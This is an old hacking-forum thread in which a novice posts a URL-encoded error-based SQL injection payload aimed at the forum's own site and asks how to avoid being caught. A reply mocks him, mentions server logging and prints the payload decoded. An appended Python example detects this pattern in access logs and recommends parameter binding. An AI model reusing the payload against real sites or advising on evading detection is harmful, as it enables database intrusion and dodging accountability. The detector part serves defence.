EvilZone

Community => General discussion => Topic started by: Santa on November 06, 2011, 06:43:30 PM

Title: SQL injection question
Post by: Santa on November 06, 2011, 06:43:30 PM
OK guys, I have a question:
Will the SQL injection

 index.php?lvl=categories&id=453+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6F63696D%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1


work to take down a website such as ( www. (http://www.thetechgame.com)evilzone.org)?
If so, what security measures should I take so I don't get caught doing this, and what should I download to keep me safe from anything else?
Title: Re: SQL injection question
Post by: ca0s on November 06, 2011, 06:54:12 PM
Do you really understand how SQLi works? Do you even know SQL? And how it is like accessing any website, with its corresponding logging?
If so, well, you will know the answer to your question. If not, go and learn. Ande made a nice tut about SQLi. There are a lot of basic manuals of SQL, use Google.
Also
Code:
(select 1 from
  (select count(*),
  concat(
    (select
      (select
        (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F63696D)
    ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
    from `information_schema`.tables group by x)a) and 1=1
Ohmy.
Title: Re: SQL injection question
Post by: Santa on November 06, 2011, 06:59:50 PM
No, I don't, but I want to learn. I will check out Ande's post when I have time.
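
On ca0s's point about logging: a request like the one in the first post is recorded in the web server's access log like any other page view, and its shape is easy to recognise there. The following is an added example, not part of the original thread, of flagging that shape in logged request lines; the sample lines, the sign names and the threshold of two signs are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log request lines (not from the thread); the second
# carries a shortened query of the same shape as the one posted above.
SAMPLE_REQUESTS = [
    "GET /index.php?lvl=categories&id=453 HTTP/1.1",
    "GET /index.php?lvl=categories&id=453+and%28select+1+from%28select+count%28*%29"
    "%2Cconcat%280x7e%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60"
    ".tables+group+by+x%29a%29 HTTP/1.1",
    "GET /search.php?q=group+by+examples HTTP/1.1",
]

# Markers of the error-based pattern, matched on decoded, normalised text.
SIGNS = {
    "information_schema": re.compile(r"information_schema"),
    "floor(rand())": re.compile(r"floor\(rand\("),
    "group by": re.compile(r"group by"),
    "subselect": re.compile(r"\(select "),
    "hex literal": re.compile(r"0x[0-9a-f]{2,}"),
}

def normalise(value):
    """Lower-case, drop backticks, collapse whitespace, tighten '(' spacing."""
    value = value.lower().replace("`", "")
    value = re.sub(r"\s+", " ", value)
    return re.sub(r"\s*\(\s*", "(", value)

def inspect(request_line, threshold=2):
    """Return (parameter, matched signs) for each suspicious query parameter."""
    target = request_line.split(" ")[1]  # "METHOD target PROTOCOL"
    findings = []
    # parse_qsl URL-decodes each value, turning '+' and %xx back into text.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        text = normalise(value)
        hits = sorted(sign for sign, rx in SIGNS.items() if rx.search(text))
        if len(hits) >= threshold:  # one sign alone is too noisy to report
            findings.append((name, hits))
    return findings

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(inspect(line) or "clean", "<-", line[:60])
```

Matching logs only detects the attempt; the underlying fix is to bind `id` as a query parameter (or cast it to an integer) so the value is never parsed as SQL.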